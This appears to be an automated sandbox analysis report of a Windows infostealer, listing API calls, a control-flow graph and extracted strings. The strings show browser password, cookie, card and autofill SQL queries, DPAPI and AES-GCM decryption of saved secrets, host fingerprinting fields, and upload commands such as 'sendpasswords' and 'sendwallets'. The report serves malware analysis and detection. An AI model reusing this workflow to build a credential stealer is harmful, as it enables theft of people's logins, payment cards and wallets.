176792->176794 176793 1415e01 _AnonymousOriginator 176793->176788 176793->176790 176794->176649 176797 1415f7a omp_get_thread_num 176795->176797 176796 141582b 176798 145d550 19 API calls 176796->176798 176800 1402bd0 5 API calls 176797->176800 176801 1415842 176798->176801 176799 145ed10 13 API calls 176799->176818 176802 1415f91 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 176800->176802 176803 14b62a0 13 API calls 176801->176803 176804 1402bd0 5 API calls 176802->176804 176805 1415852 176803->176805 176816 1415fb6 _AnonymousOriginator 176804->176816 176806 1415def GetFileAttributesA 176805->176806 176807 1410330 32 API calls 176805->176807 176806->176793 176811 141588c _AnonymousOriginator 176807->176811 176808 142aa30 28 API calls 176808->176818 176809 1415927 _AnonymousOriginator 176810 1402bd0 5 API calls 176809->176810 176826 141593e _AnonymousOriginator 176810->176826 176811->176781 176811->176809 176812 14175aa 176813 14e4fe0 messages 13 API calls 176812->176813 176815 14175c3 176813->176815 176814 1428be0 28 API calls 176814->176818 176816->176812 176817 14100f0 13 API calls 176816->176817 176819 14162bf CopyFileA 176817->176819 176818->176779 176818->176793 176818->176796 176818->176799 176818->176808 176818->176814 176853 1416318 _AnonymousOriginator __Wcsxfrm CatchIt 176819->176853 176820 1416e07 _AnonymousOriginator 176821 14d88d1 _ValidateLocalCookies 5 API calls 176820->176821 176822 14175a3 176821->176822 176822->176649 176823 145d550 19 API calls 176824 1416e9f 176823->176824 176827 14b62a0 13 API calls 176824->176827 176825 145ed10 13 API calls 176825->176853 176826->176785 176830 1415cdc _AnonymousOriginator 176826->176830 176829 1416eaf 176827->176829 176828 1417485 SetFileAttributesA DeleteFileA 176828->176820 176829->176828 176832 1410330 32 API calls 176829->176832 176831 1410ee0 131 API calls 176830->176831 176835 1415d76 _AnonymousOriginator 176831->176835 176834 1416ef2 _AnonymousOriginator 176832->176834 176833 1402bd0 5 API calls 176848 1416fc2 _AnonymousOriginator 176833->176848 176834->176833 176835->176788 176835->176806 176836 1416e02 _AnonymousOriginator 176836->176823 176837 145e990 13 API calls 176837->176853 176838 14166e7 CryptUnprotectData 176838->176853 176839 14113c0 19 API calls 176839->176853 176840 141653e BCryptOpenAlgorithmProvider 176841 1416566 BCryptSetProperty 176840->176841 176842 1416558 GetLastError 176840->176842 176843 1416584 GetLastError 176841->176843 176844 1416598 BCryptGenerateSymmetricKey 176841->176844 176842->176853 176843->176853 176845 14165bb GetLastError 176844->176845 176844->176853 176845->176853 176846 14165f6 BCryptDecrypt 176846->176853 176847 14e5124 __Wcsxfrm 13 API calls 176847->176853 176850 1410ee0 131 API calls 176848->176850 176849 1402bd0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 176849->176853 176851 1417403 _AnonymousOriginator 176850->176851 176851->176828 176852 1428be0 28 API calls 176852->176853 176853->176812 176853->176820 176853->176825 176853->176836 176853->176837 176853->176838 176853->176839 176853->176840 176853->176844 176853->176846 176853->176847 176853->176849 176853->176852 176855 1410172 176854->176855 176856 14101b4 _AnonymousOriginator 176855->176856 176857 14e4fe0 messages 13 API calls 176855->176857 176856->176649 176858 14101db 176857->176858 176861 1410082 176859->176861 176860 14100c4 _AnonymousOriginator 176860->176649 176861->176860 176862 14e4fe0 messages 13 API calls 176861->176862 176863 14100eb 176862->176863 176897 14c77fe 176864->176897 176868 14b6483 176867->176868 176874 14b62b6 176867->176874 176868->176688 176869 14b6405 176870 14a4ee0 12 API calls 176869->176870 176873 14b640c 176870->176873 176871 14b62ce 176871->176688 176872 14b6500 13 API calls 176872->176868 176873->176872 176875 14b648c 176873->176875 176874->176869 176874->176871 176876 143b080 12 API calls 176874->176876 176875->176688 176876->176874 176878 145e9a2 176877->176878 176880 145e9c2 176878->176880 176902 1458b20 13 API calls __Getcvt 176878->176902 176880->176704 176882 14e5124 __Wcsxfrm 13 API calls 176881->176882 176886 14113e7 __Getcvt 176882->176886 176883 14e5124 __Wcsxfrm 13 API calls 176884 1411483 __Getcvt __Wcsxfrm 176883->176884 176885 14114aa CryptUnprotectData 176884->176885 176887 14114cc 176885->176887 176888 141151f 176885->176888 176886->176883 176891 14e5109 ~collate 12 API calls 176887->176891 176889 14d88d1 _ValidateLocalCookies 5 API calls 176888->176889 176890 141152e 176889->176890 176890->176704 176892 14114fd 176891->176892 176893 14e5109 ~collate 12 API calls 176892->176893 176894 1411506 176893->176894 176895 14d88d1 _ValidateLocalCookies 5 API calls 176894->176895 176896 141151b 176895->176896 176896->176704 176898 14c780f GetSystemTimePreciseAsFileTime 176897->176898 176899 14c781b GetSystemTimeAsFileTime 176897->176899 176900 14117f4 omp_get_thread_num 176898->176900 176899->176900 176900->176671 176902->176880 176903->176727 176904->176771
                                        APIs
                                          • Part of subcall function 0140D180: WSAStartup.WS2_32(00000202,?), ref: 0140DCE9
                                        • WSACleanup.WS2_32 ref: 0140DD59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CleanupStartup
                                        • String ID: HTTP/1.1$0$Authorization$Basic $Content-Length$Failed to connect$Failed to create socket$Failed to get address info of $Failed to get socket flags$Failed to get socket option$Failed to read data$Failed to send data$Host$Invalid WinSock version$Invalid chunk$Invalid digit$Invalid hex digit$Only HTTP scheme is supported$Unsupported protocol$Unsupported transfer encoding: $WSAStartup failed$chunked$content-length$http$transfer-encoding$Ds
                                        • API String ID: 915672949-2844231948
                                        • Opcode ID: bef6e49ebff23b103a4240470e063bcc3602f10ac1fc7e0b1b354d39bf611b75
                                        • Instruction ID: f4b942c671784a037ab8b101706475b566045c7a4def98ab7813c0af8e3290d9
                                        • Opcode Fuzzy Hash: bef6e49ebff23b103a4240470e063bcc3602f10ac1fc7e0b1b354d39bf611b75
                                        • Instruction Fuzzy Hash: F823F371D002198FDB2ACF69CC847EEBBB1BF55310F1486AED519AB2A1D7709A84CF50
                                        APIs
                                        • __Xtime_get_ticks.LIBCPMT ref: 014150A5
                                        • omp_get_thread_num.VCOMP140(015103FB,00000000,940E2C7A,00000000,?), ref: 014150AE
                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 01415407
                                        • GetFileAttributesA.KERNELBASE(?), ref: 01415DFB
                                        • __Xtime_get_ticks.LIBCPMT ref: 01415F75
                                        • omp_get_thread_num.VCOMP140 ref: 01415F7E
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01415FA4
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014150D4
                                          • Part of subcall function 0140FB40: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0140FB71
                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 014162EF
                                        • BCryptOpenAlgorithmProvider.BCRYPT(0152C168,AES,00000000,00000000), ref: 0141654E
                                        • GetLastError.KERNEL32 ref: 01416558
                                        • BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0141657A
                                        • GetLastError.KERNEL32 ref: 01416584
                                        • BCryptGenerateSymmetricKey.BCRYPT(0152C170,00000000,00000000,?,?,00000000), ref: 014165B1
                                        • GetLastError.KERNEL32 ref: 014165BB
                                        • BCryptDecrypt.BCRYPT ref: 01416695
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0141670B
                                        • SetFileAttributesA.KERNELBASE(?,00000080), ref: 0141749F
                                        • DeleteFileA.KERNELBASE(?), ref: 014174A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptFile$ErrorLast$AttributesCopyUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@omp_get_thread_num$AlgorithmDataDecryptDeleteFolderGenerateOpenPathPropertyProviderSymmetricUnprotect
                                        • String ID: Holder: $Month/Year: $; Value: $<AND>count=$<AND>hwid=$<AND>log=$<AND>name=$AES$Card Number: $ChainingMode$ChainingModeGCM$Name: $SELECT name, value FROM autofill$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\tmp$application/octet-stream$sendcards$sendfills
                                        • API String ID: 3183400236-4253808811
                                        • Opcode ID: 1cf3cab2b793cfd6467f2d6d9e4cb88ebe0d99bc507a17b5673b7418ab1bd3c0
                                        • Instruction ID: 729d5641c641eaaa63acf727c152d65fe31d68bf55eec1e0acf5de2fa58676a2
                                        • Opcode Fuzzy Hash: 1cf3cab2b793cfd6467f2d6d9e4cb88ebe0d99bc507a17b5673b7418ab1bd3c0
                                        • Instruction Fuzzy Hash: 672316709002588BEB29CB28CD487EDBB72AFA6314F1482DDD1096B3A6D7759BC4CF51
                                        APIs
                                        • RegGetValueW.KERNELBASE(80000002,00000000,DisplayName,0000FFFF,00000000,?,00002000), ref: 014187A0
                                        • RegCloseKey.ADVAPI32(00000000,?,00000000,00020019,00000000,940E2C7A), ref: 01418916
                                        • GetKeyboardLayout.USER32(00000000), ref: 01418A5C
                                        • GetLocaleInfoW.KERNELBASE(?), ref: 01418A66
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,?), ref: 01418B5F
                                        • LocalAlloc.KERNEL32(00000040), ref: 01418B6D
                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 01418B7B
                                        • GetLocaleInfoW.KERNEL32(?,00000002,?,00000200), ref: 01418BD9
                                          • Part of subcall function 01422E30: std::locale::_Init.LIBCPMT ref: 01422E88
                                          • Part of subcall function 01422E30: std::_Lockit::_Lockit.LIBCPMT ref: 01422EFC
                                          • Part of subcall function 01422E30: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01422F44
                                          • Part of subcall function 01422E30: __Getcvt.LIBCPMT ref: 01422F50
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 01418E7C
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01418EDD
                                        • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 01418EFC
                                        • FreeSid.ADVAPI32(?), ref: 01418F12
                                        • GetSystemMetrics.USER32 ref: 01419180
                                        • GetSystemMetrics.USER32(00000001), ref: 01419195
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayout$FreeInfoListLocalLocaleMetricsSystemstd::_$AllocAllocateCheckCloseGetcvtInitInitializeLocinfo::_Locinfo_ctorLockitLockit::_MembershipTokenValuestd::locale::_
                                        • String ID: Cores$ | RAM: $&admin=$&cpu=$&hwid=$&lang=$&langs=$&name=$&os=$&ram=$&sizex=$&sizey=$&video=$DisplayName$True$application/x-www-form-urlencoded$msg$osinfo
                                        • API String ID: 3459785268-2404944243
                                        • Opcode ID: 77135a04e57de15ed6bb8e42bcaf1658194f2131c77450cb18546281251833df
                                        • Instruction ID: 8187c1c60d700993adcd57cd53735fe35cebedefbe7666407586bbc8effeb436
                                        • Opcode Fuzzy Hash: 77135a04e57de15ed6bb8e42bcaf1658194f2131c77450cb18546281251833df
                                        • Instruction Fuzzy Hash: F323C1709002A98FEB29CB28CD54BEDBB72AF55304F1481D9D148AB2A5DBB59FC4CF50
                                        APIs
                                        • __Xtime_get_ticks.LIBCPMT ref: 01412DFF
                                        • omp_get_thread_num.VCOMP140(015103FB,00000000), ref: 01412E08
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01412E2E
                                          • Part of subcall function 0140FB40: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0140FB71
                                        • BCryptOpenAlgorithmProvider.BCRYPT(0152C168,AES,00000000,00000000), ref: 0141350E
                                        • GetLastError.KERNEL32 ref: 01413518
                                        • BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0141353A
                                        • GetLastError.KERNEL32 ref: 01413544
                                        • BCryptGenerateSymmetricKey.BCRYPT(0152C170,00000000,00000000,?,?,00000000), ref: 01413571
                                        • GetLastError.KERNEL32 ref: 0141357B
                                        • BCryptDecrypt.BCRYPT ref: 0141365B
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01413752
                                        Strings
                                        • [DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 0141354B
                                        • ChainingModeGCM, xrefs: 0141352A
                                        • SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies, xrefs: 0141327F
                                        • [DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 0141351F
                                        • application/octet-stream, xrefs: 01414D93
                                        • stoll argument out of range, xrefs: 0141500C
                                        • ChainingMode, xrefs: 0141352F
                                        • sendcookies, xrefs: 01414DBF
                                        • AES, xrefs: 01413502
                                        • \Temp\tmp, xrefs: 01412E51
                                        • <AND>count=, xrefs: 01414AB2
                                        • invalid stoll argument, xrefs: 01415016
                                        • <AND>hwid=, xrefs: 014149CF
                                        • True, xrefs: 01413CA6, 01413D2F
                                        • <AND>name=, xrefs: 014149DC
                                        • <AND>log=, xrefs: 01414A47
                                        • False, xrefs: 01413CAF, 01413D38
                                        • [DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 01413582
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$ErrorLast$AlgorithmDataDecryptFolderGenerateOpenPathPropertyProviderSymmetricUnothrow_t@std@@@UnprotectXtime_get_ticks__ehfuncinfo$??2@omp_get_thread_num
                                        • String ID: <AND>count=$<AND>hwid=$<AND>log=$<AND>name=$AES$ChainingMode$ChainingModeGCM$False$SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies$True$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\tmp$application/octet-stream$invalid stoll argument$sendcookies$stoll argument out of range
                                        • API String ID: 3153028717-66004453
                                        • Opcode ID: b9013e074cd61ea58edef302517d0e24885b1bbd8979b871a26cf8c577f0c665
                                        • Instruction ID: 703c91acff8fc250d032b56a01ace0c5c7e301aa04c6617d0fccd4397789559b
                                        • Opcode Fuzzy Hash: b9013e074cd61ea58edef302517d0e24885b1bbd8979b871a26cf8c577f0c665
                                        • Instruction Fuzzy Hash: 401302709002599BEB29CB28CD4C7EDBB72AFA2314F1482DED1086B2A6D7755BC4CF51
                                        APIs
                                        • __Xtime_get_ticks.LIBCPMT ref: 014117EF
                                        • omp_get_thread_num.VCOMP140(015103FB,00000000), ref: 014117F8
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0141181E
                                          • Part of subcall function 0140FB40: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0140FB71
                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 01411B71
                                        • BCryptOpenAlgorithmProvider.BCRYPT(0152C168,AES,00000000,00000000), ref: 01411CD8
                                        • GetLastError.KERNEL32 ref: 01411CE2
                                        • BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 01411D04
                                        • GetLastError.KERNEL32 ref: 01411D0E
                                        • BCryptGenerateSymmetricKey.BCRYPT(0152C170,00000000,00000000,?,?,00000000), ref: 01411D3B
                                        • GetLastError.KERNEL32 ref: 01411D45
                                        • BCryptDecrypt.BCRYPT ref: 01411E1F
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01411E84
                                        • SetFileAttributesA.KERNELBASE(?,00000080), ref: 01412C2E
                                        • DeleteFileA.KERNELBASE(?), ref: 01412C35
                                        Strings
                                        • [DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 01411D15
                                        • Login: , xrefs: 01412142
                                        • ChainingModeGCM, xrefs: 01411CF4
                                        • [DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 01411CE9
                                        • application/octet-stream, xrefs: 01412B27
                                        • SELECT origin_url, username_value, password_value FROM logins, xrefs: 01411BAB
                                        • ChainingMode, xrefs: 01411CF9
                                        • AES, xrefs: 01411CCC
                                        • \Temp\tmp, xrefs: 01411841
                                        • <AND>count=, xrefs: 01412846
                                        • Host: , xrefs: 014120E8
                                        • <AND>hwid=, xrefs: 01412763
                                        • <AND>name=, xrefs: 01412770
                                        • <AND>log=, xrefs: 014127DB
                                        • sendpasswords, xrefs: 01412B53
                                        • Password: , xrefs: 014121B4
                                        • [DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 01411D4C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$ErrorFileLast$AlgorithmAttributesCopyDataDecryptDeleteFolderGenerateOpenPathPropertyProviderSymmetricUnothrow_t@std@@@UnprotectXtime_get_ticks__ehfuncinfo$??2@omp_get_thread_num
                                        • String ID: Login: $Password: $<AND>count=$<AND>hwid=$<AND>log=$<AND>name=$AES$ChainingMode$ChainingModeGCM$Host: $SELECT origin_url, username_value, password_value FROM logins$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\tmp$application/octet-stream$sendpasswords
                                        • API String ID: 1794485202-73612781
                                        • Opcode ID: 3b249a2bcfce860edf945359d0c19ca5e4ccc16b116929ecb26d489686679039
                                        • Instruction ID: c2003c5850a7ab2d3dc095ef70d47004e598e9d483e029ffc111254d63972f61
                                        • Opcode Fuzzy Hash: 3b249a2bcfce860edf945359d0c19ca5e4ccc16b116929ecb26d489686679039
                                        • Instruction Fuzzy Hash: E3C2F5709002589BEB29CB28CD5CBDDBB72AF65304F2481DDD208AB2A6D7755BC5CF50
                                        APIs
                                        • GetKeyboardLayout.USER32(00000000), ref: 01418A5C
                                        • GetLocaleInfoW.KERNELBASE(?), ref: 01418A66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoKeyboardLayoutLocale
                                        • String ID: Cores$&admin=$&cpu=$&hwid=$&lang=$&langs=$&name=$&os=$&ram=$&sizex=$&sizey=$&video=$False$application/x-www-form-urlencoded$msg$osinfo
                                        • API String ID: 1218629382-1283071188
                                        • Opcode ID: 60640908636e533895f8c1120f78f30375837ce4297b36b4c14cd668f6c1398a
                                        • Instruction ID: 84f7121b178c284d3a9d4030d356580b84f1b9b6e56a665e6f08f56ce9b13785
                                        • Opcode Fuzzy Hash: 60640908636e533895f8c1120f78f30375837ce4297b36b4c14cd668f6c1398a
                                        • Instruction Fuzzy Hash: EAB268708042A9CEEB25CF14CD587EEBBB1AF65304F5481D9C1482B292DBB55BC8DFA1
                                        APIs
                                        • Sleep.KERNELBASE(00124F80,?,00000000,?), ref: 01422553
                                          • Part of subcall function 01411550: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 01411598
                                          • Part of subcall function 01411550: lstrcatA.KERNEL32(00000000,00000000), ref: 014115E5
                                          • Part of subcall function 01411550: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 014115FB
                                          • Part of subcall function 01411550: GetFileSize.KERNEL32(00000000,00000000), ref: 0141160F
                                          • Part of subcall function 01411550: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 01411643
                                          • Part of subcall function 01411550: CloseHandle.KERNEL32(00000000), ref: 01411652
                                        • GetFileAttributesA.KERNEL32(?), ref: 0142183D
                                        • GetFileAttributesA.KERNEL32(?), ref: 01421943
                                        • GetFileAttributesA.KERNEL32(?), ref: 01421A49
                                        • GetFileAttributesA.KERNEL32(?,00000000,?,?,?,-00000008,?,?,?,00000000,?,?,00000000), ref: 01421B44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Attributes$CloseCreateFolderHandlePathReadSizeSleeplstrcat
                                        • String ID: @$browsers$browsers:$cards$close$cookies$defenders$files$fills$invalid stoi argument$logs$osinfo$proccesses$softwares$stoi argument out of range$update$updbrows$wallets
                                        • API String ID: 2237993004-1686368177
                                        • Opcode ID: 5196f6aa19e681393cc306b6db0799d0c583c809f9d98e25c785812973f48b13
                                        • Instruction ID: 27a76dc4f09f44d68a402b2c1943cf2019f7b03eb39a60a6f670cac07d3bc033
                                        • Opcode Fuzzy Hash: 5196f6aa19e681393cc306b6db0799d0c583c809f9d98e25c785812973f48b13
                                        • Instruction Fuzzy Hash: BDC2E5309041698FDF25CF38C8587AEBBB2AF55314FA482DAC49967361D731AAC6CF50
                                        APIs
                                        • _vcomp_for_static_simple_init.VCOMP140(00000000,?,00000001,00000001,?,?,940E2C7A), ref: 014FB829
                                        • GetFileAttributesA.KERNELBASE(?,?,?,940E2C7A), ref: 014FB8AE
                                        • _vcomp_for_static_end.VCOMP140(?,?,940E2C7A), ref: 014FB9AA
                                        • _vcomp_for_static_simple_init.VCOMP140(00000000,?,00000001,00000001,?,?,940E2C7A,00000000,?), ref: 014FBA59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _vcomp_for_static_simple_init$AttributesFile_vcomp_for_static_end
                                        • String ID: <AND>browser=$<AND>file=$<AND>hwid=$<AND>name=$<AND>namefile=$application/octet-stream$sendwallets
                                        • API String ID: 1410907095-134213753
                                        • Opcode ID: 81abaf4528246cf9b450181bcb2eee2edc170918e8d03928f785c13bbee23778
                                        • Instruction ID: 3d8e84b52b0ea256f3d729ad0ff01cf81deaeedda692bef2d47ed77a6847bf01
                                        • Opcode Fuzzy Hash: 81abaf4528246cf9b450181bcb2eee2edc170918e8d03928f785c13bbee23778
                                        • Instruction Fuzzy Hash: DBB203709002599FEB29CB28CD84BADBBB6EF55314F1481DDE108AB3A1DB359B85CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4135 1420bd0-1420c94 call 14d8ada * 2 call 141e230 4142 1421d51 4135->4142 4143 1420c9a-1420cad 4135->4143 4144 1421d58-1421d8b call 14227a0 * 2 call 14d88d1 4142->4144 4143->4142 4145 1420cb3-1420e75 call 1423b80 4143->4145 4157 1420e7b-14213a6 call 14287f0 4145->4157 4158 1421d8c-1421e79 call 1424b80 * 3 call 1423b80 call 1410ee0 call 1424b80 call 14230b0 call 1427f90 4145->4158 4179 1421d04 4157->4179 4180 14213ac-1421539 call 1424b80 * 2 call 14d8ada * 2 call 14101e0 * 2 4157->4180 4202 1421ea7-1421f02 call 140fb40 call 1423a20 4158->4202 4203 1421e7b-1421e87 4158->4203 4184 1421d0a-1421d14 4179->4184 4244 1421c55-1421c75 call 14227a0 * 2 4180->4244 4245 142153f 4180->4245 4187 1421d41-1421d4b 4184->4187 4188 1421d16-1421d21 4184->4188 4187->4142 4187->4145 4191 1421d23-1421d31 4188->4191 4192 1421d37-1421d3e call 14d8e70 4188->4192 4191->4192 4195 14223b5 call 14e4fe0 4191->4195 4192->4187 4204 14223ba call 14e4fe0 4195->4204 4223 1421f33-1421f69 GetFileAttributesA 4202->4223 4224 1421f04-1421f13 4202->4224 4206 1421e89-1421e97 4203->4206 4207 1421e9d-1421ea4 call 14d8e70 4203->4207 4211 14223bf-1422488 call 14e4fe0 call 1427ee0 call 142e620 call 1425f00 call 1425e60 4204->4211 4206->4207 4206->4211 4207->4202 4271 142248a 4211->4271 4272 142248c-14224ae call 1437e50 call 1437f00 4211->4272 4227 1421f73-1421f85 call 140fb40 4223->4227 4228 1421f6b-1421f6d 4223->4228 4225 1421f15-1421f23 4224->4225 4226 1421f29-1421f30 call 14d8e70 4224->4226 4225->4195 4225->4226 4226->4223 4242 1421f87-1421f8d 4227->4242 4243 1421ff8-1421ffe 4227->4243 4228->4227 4232 142202c-14220c4 call 1425c70 call 1431d60 4228->4232 4266 14220c6 4232->4266 4267 14220e8-14221db call 1424b80 * 2 call 1423b80 call 141fb30 ShellExecuteExW 4232->4267 4250 1421fbe-1421ff5 4242->4250 4251 1421f8f-1421f9e 4242->4251 4243->4232 4247 1422000-142200c 4243->4247 4280 1421ca6-1421cce 4244->4280 4281 1421c77-1421c86 4244->4281 4252 1421540-1421592 call 1423b80 call 14e50f6 call 14e217e 4245->4252 4256 1422022-1422029 call 14d8e70 4247->4256 4257 142200e-142201c 4247->4257 4250->4243 4260 1421fa0-1421fae 4251->4260 4261 1421fb4-1421fbb call 14d8e70 4251->4261 4299 14223ab-14223b0 call 14c347c 4252->4299 4300 1421598-142159b 4252->4300 4256->4232 4257->4204 4257->4256 4260->4204 4260->4261 4261->4250 4275 14220d0-14220e6 call 1424560 4266->4275 4326 1422212-1422238 4267->4326 4327 14221dd-14221f2 4267->4327 4271->4272 4308 14224b0-14224bd 4272->4308 4309 14224dd-14224f9 4272->4309 4275->4267 4288 1421cd0-1421cdf 4280->4288 4289 1421cff-1421d02 4280->4289 4286 1421c88-1421c96 4281->4286 4287 1421c9c-1421ca3 call 14d8e70 4281->4287 4286->4195 4286->4287 4287->4280 4295 1421ce1-1421cef 4288->4295 4296 1421cf5-1421cfc call 14d8e70 4288->4296 4289->4184 4295->4195 4295->4296 4296->4289 4299->4195 4306 14223a1-14223a6 call 14c34bc 4300->4306 4307 14215a1-14215d2 call 1411550 4300->4307 4306->4299 4328 1421bf1-1421bfe 4307->4328 4329 14215d8-1421b16 call 1423b80 4307->4329 4313 14224d3-14224da call 14d8e70 4308->4313 4314 14224bf-14224cd 4308->4314 4315 14224fb-1422508 4309->4315 4316 1422528-1422535 call 14206d0 4309->4316 4313->4309 4314->4313 4320 14225f7 call 14e4fe0 4314->4320 4322 142250a-1422518 4315->4322 4323 142251e-1422525 call 14d8e70 4315->4323 4333 1422537-142253d 4316->4333 4334 1422559-1422560 4316->4334 4340 14225fc-1422601 call 14e4fe0 4320->4340 4322->4320 4322->4323 4323->4316 4341 142223a-1422249 4326->4341 4342 1422269-142228a 4326->4342 4335 14221f4-1422202 4327->4335 4336 1422208-142220f call 14d8e70 4327->4336 4338 1421c00-1421c0f 4328->4338 4339 1421c2f-1421c43 4328->4339 4414 1421baa-1421bb4 4329->4414 4415 1421b1c-1421b4d call 14100f0 GetFileAttributesA 4329->4415 4346 1422540-1422557 call 1420bd0 Sleep 4333->4346 4347 1422562-142256f 4334->4347 4348 142258b-14225a7 4334->4348 4335->4211 4335->4336 4336->4326 4351 1421c11-1421c1f 4338->4351 4352 1421c25-1421c2c call 14d8e70 4338->4352 4339->4252 4343 1421c49-1421c4f 4339->4343 4354 142224b-1422259 4341->4354 4355 142225f-1422266 call 14d8e70 4341->4355 4344 14222bb-14222d9 4342->4344 4345 142228c-142229b 4342->4345 4343->4244 4360 142230a-1422336 call 14231a0 4344->4360 4361 14222db-14222ea 4344->4361 4357 14222b1-14222b8 call 14d8e70 4345->4357 4358 142229d-14222ab 4345->4358 4346->4334 4362 1422581-1422588 call 14d8e70 4347->4362 4363 1422571-142257f 4347->4363 4366 14225d2-14225f4 call 141c670 call 14d88d1 4348->4366 4367 14225a9-14225b6 4348->4367 4351->4195 4351->4352 4352->4339 4354->4211 4354->4355 4355->4342 4357->4344 4358->4211 4358->4357 4391 1422360-1422369 4360->4391 4392 1422338-1422344 4360->4392 4373 1422300-1422307 call 